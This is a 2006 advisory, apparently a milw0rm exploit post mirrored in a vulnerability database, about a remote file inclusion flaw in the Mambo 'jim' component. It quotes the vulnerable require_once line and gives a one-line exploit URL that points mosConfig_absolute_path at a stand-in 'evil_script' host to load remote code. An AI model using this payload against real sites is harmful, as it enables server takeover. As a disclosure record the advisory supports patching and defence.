Mambo jim Component Remote Include Vulnerability

2006-08-21T00:00:00
ID SECURITYVULNS:DOC:13966
Type securityvulns
Reporter Securityvulns
Modified 2006-08-21T00:00:00

Description

####### C Y B E R - W A R R I O R T I M

Mambo jim Component Remote Include Vulnerability

Author: XORON

Class: Remote

cont@ct: x0r0n[at]hotmail[dot]com

Code: in install.jim.php , line 16

require_once($mosConfig_absolute_path."/components/com_jim/readme.txt");

Exploit:

http://www.site.com/[path]/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=http://evil_script?

Greetz: str0ke, Ironfist, Preddy, SHiKaA, sakkkure, x-mastER, DJR, DaRK, EntriKa, R3D4C!D, iNSoMNiA and all my friend

milw0rm.com [2006-08-17]